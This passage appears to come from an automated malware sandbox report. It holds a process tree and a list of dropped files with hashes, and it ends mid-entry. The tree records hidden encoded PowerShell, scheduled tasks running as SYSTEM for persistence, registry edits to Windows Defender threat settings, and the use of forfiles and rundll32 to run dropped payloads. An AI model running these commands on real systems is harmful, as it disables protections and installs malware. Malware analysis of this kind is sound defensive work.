                                                                                                                    "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" && schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" /F
                                                                                                                    2⤵
                                                                                                                      PID:5280
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                    1⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:1004
                                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                      2⤵
                                                                                                                        PID:6036
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                      1⤵
                                                                                                                        PID:5176
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                        1⤵
                                                                                                                          PID:2992
                                                                                                                        • C:\Windows\system32\gpscript.exe
                                                                                                                          gpscript.exe /RefreshSystemParam
                                                                                                                          1⤵
                                                                                                                            PID:236
                                                                                                                          • C:\Windows\Temp\kvKwEgGmKkXJvFrr\rZMTnhYjhyLmNuX\bkUoUio.exe
                                                                                                                            C:\Windows\Temp\kvKwEgGmKkXJvFrr\rZMTnhYjhyLmNuX\bkUoUio.exe Fz /glFIdidiV 385107 /S
                                                                                                                            1⤵
                                                                                                                            • Checks computer location settings
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Drops Chrome extension
                                                                                                                            • Drops file in System32 directory
                                                                                                                            • Drops file in Program Files directory
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:720
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                              2⤵
                                                                                                                                PID:1952
                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                  3⤵
                                                                                                                                  • Indirect Command Execution
                                                                                                                                  PID:1112
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                    4⤵
                                                                                                                                      PID:4504
                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                        5⤵
                                                                                                                                          PID:3764
                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                      3⤵
                                                                                                                                      • Indirect Command Execution
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:4252
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                        4⤵
                                                                                                                                          PID:2096
                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                            5⤵
                                                                                                                                              PID:3808
                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                          3⤵
                                                                                                                                          • Indirect Command Execution
                                                                                                                                          PID:5296
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                            4⤵
                                                                                                                                              PID:4128
                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                5⤵
                                                                                                                                                  PID:5840
                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                              3⤵
                                                                                                                                              • Indirect Command Execution
                                                                                                                                              PID:5508
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                4⤵
                                                                                                                                                  PID:4848
                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                    5⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:5212
                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                3⤵
                                                                                                                                                • Indirect Command Execution
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:1768
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                  4⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:3340
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                    5⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    PID:876
                                                                                                                                                    • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                      6⤵
                                                                                                                                                        PID:5972
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /DELETE /F /TN "bAURefglkfXMIGMYVR"
                                                                                                                                                2⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:4800
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                                                                2⤵
                                                                                                                                                  PID:2984
                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                    3⤵
                                                                                                                                                    • Indirect Command Execution
                                                                                                                                                    PID:1236
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                      4⤵
                                                                                                                                                        PID:696
                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                          5⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          PID:4960
                                                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                            6⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:6132
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\GWamqZVWU\CCeSIR.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "YPIUkAhXIxAocLu" /V1 /F
                                                                                                                                                    2⤵
                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:5896
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /CREATE /TN "YPIUkAhXIxAocLu2" /F /xml "C:\Program Files (x86)\GWamqZVWU\adgJRCt.xml" /RU "SYSTEM"
                                                                                                                                                    2⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:200
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /END /TN "YPIUkAhXIxAocLu"
                                                                                                                                                    2⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:6088
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /DELETE /F /TN "YPIUkAhXIxAocLu"
                                                                                                                                                    2⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:2956
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /CREATE /TN "vmRiSjUYMxyipE" /F /xml "C:\Program Files (x86)\qCkphlJEjzXU2\IpiJeEp.xml" /RU "SYSTEM"
                                                                                                                                                    2⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:5636
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /CREATE /TN "JkNkKYYKQHkJa2" /F /xml "C:\ProgramData\waPdBDBOzCnVwFVB\gRgplkY.xml" /RU "SYSTEM"
                                                                                                                                                    2⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:4804
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /CREATE /TN "wnrjDODVDojlYZAQV2" /F /xml "C:\Program Files (x86)\usHRsfrcBQZgjTeIdMR\AysBWav.xml" /RU "SYSTEM"
                                                                                                                                                    2⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:4460
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /CREATE /TN "GHPyaplqcKioSqURUFk2" /F /xml "C:\Program Files (x86)\QEWXpPeaXUxnC\VQcFFqg.xml" /RU "SYSTEM"
                                                                                                                                                    2⤵
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:5356
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /CREATE /TN "dfuJCXiChfCXHQVcD" /SC once /ST 02:47:58 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\kvKwEgGmKkXJvFrr\IjelvqDQ\JIwqxAu.dll\",#1 /RWrdidfp 385107" /V1 /F
                                                                                                                                                    2⤵
                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:768
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /run /I /tn "dfuJCXiChfCXHQVcD"
                                                                                                                                                    2⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:4812
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /DELETE /F /TN "CXcXrFnFggmBuldeR"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2180
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 720 -s 2432
                                                                                                                                                      2⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:2148
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3876 -ip 3876
                                                                                                                                                    1⤵
                                                                                                                                                      PID:5776
                                                                                                                                                    • C:\Windows\system32\rundll32.EXE
                                                                                                                                                      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\kvKwEgGmKkXJvFrr\IjelvqDQ\JIwqxAu.dll",#1 /RWrdidfp 385107
                                                                                                                                                      1⤵
                                                                                                                                                        PID:5352
                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\kvKwEgGmKkXJvFrr\IjelvqDQ\JIwqxAu.dll",#1 /RWrdidfp 385107
                                                                                                                                                          2⤵
                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                          PID:1176
                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                            schtasks /DELETE /F /TN "dfuJCXiChfCXHQVcD"
                                                                                                                                                            3⤵
                                                                                                                                                              PID:2540
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3172 -ip 3172
                                                                                                                                                          1⤵
                                                                                                                                                            PID:2384
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 720 -ip 720
                                                                                                                                                            1⤵
                                                                                                                                                              PID:2116

                                                                                                                                                            Network

                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                            Replay Monitor

                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                            Downloads

                                                                                                                                                            • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                              Filesize

                                                                                                                                                              2.0MB

                                                                                                                                                              MD5

                                                                                                                                                              e22b402c771a85ffbe3cc674fbd96af5

                                                                                                                                                              SHA1

                                                                                                                                                              8b6fe499f6a890251ecc7c75dbda1da13d1742a8

                                                                                                                                                              SHA256

                                                                                                                                                              364a4ce17ae27258e1f59682b1787d32cf86e05642457cdaab615df8a04d126a

                                                                                                                                                              SHA512

                                                                                                                                                              f348c8991cc7c9510dccb60034aa0020992e413660671f9406da14f26d141eb94c3c2c57b04f3843df8b871757a1bc6eeab17743c0287d3f0f42b8317d3662d6

                                                                                                                                                            • C:\ProgramData\mozglue.dll

                                                                                                                                                              Filesize

                                                                                                                                                              593KB

                                                                                                                                                              MD5

                                                                                                                                                              c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                              SHA1

                                                                                                                                                              95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                              SHA256

                                                                                                                                                              ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                              SHA512

                                                                                                                                                              fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                            • C:\ProgramData\nss3.dll

                                                                                                                                                              Filesize

                                                                                                                                                              2.0MB

                                                                                                                                                              MD5

                                                                                                                                                              1cc453cdf74f31e4d913ff9c10acdde2

                                                                                                                                                              SHA1

                                                                                                                                                              6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                                                                                                              SHA256

                                                                                                                                                              ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                                                                                                              SHA512

                                                                                                                                                              dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                                                                                                            • C:\Users\Admin\1000238002\Amadeus.exe

                                                                                                                                                              Filesize

                                                                                                                                                              5.3MB

                                                                                                                                                              MD5

                                                                                                                                                              36a627b26fae167e6009b4950ff15805

                                                                                                                                                              SHA1

                                                                                                                                                              f3cb255ab3a524ee05c8bab7b4c01c202906b801

                                                                                                                                                              SHA256

                                                                                                                                                              a2389de50f83a11d6fe99639fc5c644f6d4dcea6834ecbf90a4ead3d5f36274a

                                                                                                                                                              SHA512

                                                                                                                                                              2133aba3e2a41475b2694c23a9532c238abab0cbae7771de83f9d14a8b2c0905d44b1ba0b1f7aae501052f4eba0b6c74018d66c3cbc8e8e3443158438a621094

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                              Filesize

                                                                                                                                                              187B

                                                                                                                                                              MD5

                                                                                                                                                              2a1e12a4811892d95962998e184399d8

                                                                                                                                                              SHA1

                                                                                                                                                              55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                              SHA256

                                                                                                                                                              32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                              SHA512

                                                                                                                                                              bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                              Filesize

                                                                                                                                                              136B

                                                                                                                                                              MD5

                                                                                                                                                              238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                              SHA1

                                                                                                                                                              0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                              SHA256

                                                                                                                                                              801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                              SHA512

                                                                                                                                                              2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                              Filesize

                                                                                                                                                              150B

                                                                                                                                                              MD5

                                                                                                                                                              0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                              SHA1

                                                                                                                                                              6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                              SHA256

                                                                                                                                                              0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                              SHA512

                                                                                                                                                              5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                              Filesize

                                                                                                                                                              35KB

                                                                                                                                                              MD5

                                                                                                                                                              c6578e5f4bf08cf6929d49ce157101ef

                                                                                                                                                              SHA1

                                                                                                                                                              5ecfe8f1dd8ee204261412da1a4d2faf0555c05c

                                                                                                                                                              SHA256

                                                                                                                                                              af3a2b16d356366116c8e1be2a5a62a3b21c15f2f4fb88d022e59426e4e5754e

                                                                                                                                                              SHA512

                                                                                                                                                              12648a35b32f2622d85b85751a6face91843875c74417600a9cee63643171921c51be8dc0c95907c5ccfe4b5fb1bc6836a58070354cc5a969d34481f806cd685

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              faa2dd409bb88491b6c57728dbf8a673

                                                                                                                                                              SHA1

                                                                                                                                                              6095f074030e7599cb1f9c251c62e2c0d1fb7418

                                                                                                                                                              SHA256

                                                                                                                                                              955d02ee998eae94048f3a1b33c8eedc73276ef0a179efb1cebc970d9af0df09

                                                                                                                                                              SHA512

                                                                                                                                                              0ab69299400998bc05fe7074b2c9b01162db9343deab22b502a26c47a054d2ca42918908fcc77a8cc5d275c17635508d546c3f65d857f37a7331ec9c32a766ce

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

                                                                                                                                                              Filesize

                                                                                                                                                              151B

                                                                                                                                                              MD5

                                                                                                                                                              bd6b60b18aee6aaeb83b35c68fb48d88

                                                                                                                                                              SHA1

                                                                                                                                                              9b977a5fbf606d1104894e025e51ac28b56137c3

                                                                                                                                                              SHA256

                                                                                                                                                              b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

                                                                                                                                                              SHA512

                                                                                                                                                              3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              15KB

                                                                                                                                                              MD5

                                                                                                                                                              62b23e646c17a8f043e2c5ffdb93fef6

                                                                                                                                                              SHA1

                                                                                                                                                              731ac31e3532e3a127c27c992b095b2aaf492d11

                                                                                                                                                              SHA256

                                                                                                                                                              566b6db08bcb7d054df1d55943a70b7a00ae66cef1e745ef85cd5f001119467d

                                                                                                                                                              SHA512

                                                                                                                                                              81a2eb8f102757b102e79bd0cd2d56d7d60a31f2aaaebff6074eacbfdb8a26a9a254d11b52d7139b2eb98d87700989a176de6e7de3ab4839fd720722ceb6fe2d

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000002001\crypted.exe

                                                                                                                                                              Filesize

                                                                                                                                                              314KB

                                                                                                                                                              MD5

                                                                                                                                                              6134586375c01f97f8777bae1bf5ed98

                                                                                                                                                              SHA1

                                                                                                                                                              4787fa996b75dbc54632cc321725ee62666868a1

                                                                                                                                                              SHA256

                                                                                                                                                              414becb8aabd4e8c406e84df062bee1a45cffa334ae30022078cfa71da9e330d

                                                                                                                                                              SHA512

                                                                                                                                                              652ed16d96b5700f105c2bab8e7258f167bc1615b6397be7340c08df7c977842844326e07fdef677aecfaf07263f99bb7968c9fc926e90e5a33d2ed793f8436b

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe

                                                                                                                                                              Filesize

                                                                                                                                                              1.1MB

                                                                                                                                                              MD5

                                                                                                                                                              8e74497aff3b9d2ddb7e7f819dfc69ba

                                                                                                                                                              SHA1

                                                                                                                                                              1d18154c206083ead2d30995ce2847cbeb6cdbc1

                                                                                                                                                              SHA256

                                                                                                                                                              d8e81d9e336ef37a37cae212e72b6f4ef915db4b0f2a8df73eb584bd25f21e66

                                                                                                                                                              SHA512

                                                                                                                                                              9aacc5c130290a72f1087daa9e79984565ccab6dbcad5114bfed0919812b9ba5f8dee9c37d230eeca4df3cca47ba0b355fbf49353e53f10f0ebc266e93f49f97

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe

                                                                                                                                                              Filesize

                                                                                                                                                              416KB

                                                                                                                                                              MD5

                                                                                                                                                              f5d7b79ee6b6da6b50e536030bcc3b59

                                                                                                                                                              SHA1

                                                                                                                                                              751b555a8eede96d55395290f60adc43b28ba5e2

                                                                                                                                                              SHA256

                                                                                                                                                              2f1aff28961ba0ce85ea0e35b8936bc387f84f459a4a1d63d964ce79e34b8459

                                                                                                                                                              SHA512

                                                                                                                                                              532b17cd2a6ac5172b1ddba1e63edd51ab53a4527204415241e3a78e8ffeb9728071bde5ae1eefabefd2627f00963f8a5458668cd7b8df041c8683252ff56b46

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe

                                                                                                                                                              Filesize

                                                                                                                                                              187KB

                                                                                                                                                              MD5

                                                                                                                                                              7a02aa17200aeac25a375f290a4b4c95

                                                                                                                                                              SHA1

                                                                                                                                                              7cc94ca64268a9a9451fb6b682be42374afc22fd

                                                                                                                                                              SHA256

                                                                                                                                                              836799fd760eba25e15a55c75c50b977945c557065a708317e00f2c8f965339e

                                                                                                                                                              SHA512

                                                                                                                                                              f6ebfe7e087aa354722cea3fddd99b1883a862fb92bb5a5a86782ea846a1bff022ab7db4397930bcabaa05cb3d817de3a89331d41a565bc1da737f2c5e3720b6

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000129001\Set-up.exe

                                                                                                                                                              Filesize

                                                                                                                                                              6.4MB

                                                                                                                                                              MD5

                                                                                                                                                              06b767bf2a7deac9b9e524c5b6986bf7

                                                                                                                                                              SHA1

                                                                                                                                                              8a0d79d7d04b89658394d72c4071a1f4037f32b2

                                                                                                                                                              SHA256

                                                                                                                                                              c4c861dda94e9b3275d123e78d73bb9180b618855730eb2217a656d14e35a854

                                                                                                                                                              SHA512

                                                                                                                                                              0ba0e7d75355847bf9a124fd35a69f3f5281a351f730bd4bab23ad3c5466a40fda58871c77314557d42082c98a476b20fb68351dfbfb635cd6a958ab19765300

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000191001\1.exe

                                                                                                                                                              Filesize

                                                                                                                                                              3.5MB

                                                                                                                                                              MD5

                                                                                                                                                              17d51083ccb2b20074b1dc2cac5bea36

                                                                                                                                                              SHA1

                                                                                                                                                              0a046864ad4304f63dbde5ac14d3dc05cfb48d46

                                                                                                                                                              SHA256

                                                                                                                                                              681eeececd77eb1433111641c33c8424eaf2c1265e2d4a7e4d6f023865fb5d94

                                                                                                                                                              SHA512

                                                                                                                                                              7da8a2fd0321231c17fddf414bf1d5a03d71dbc619f68958ff1d167003f972920f0f3c830b8a25aa715df4fcc044d88d739b6eab115a5b0b0a53852a70f4238a

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000228001\GetSys.exe

                                                                                                                                                              Filesize

                                                                                                                                                              10.6MB

                                                                                                                                                              MD5

                                                                                                                                                              87939a5b42854b08804a9a0ae605b260

                                                                                                                                                              SHA1

                                                                                                                                                              e21ec74f722d3a5bae0d183a73156a0d42d4b251

                                                                                                                                                              SHA256

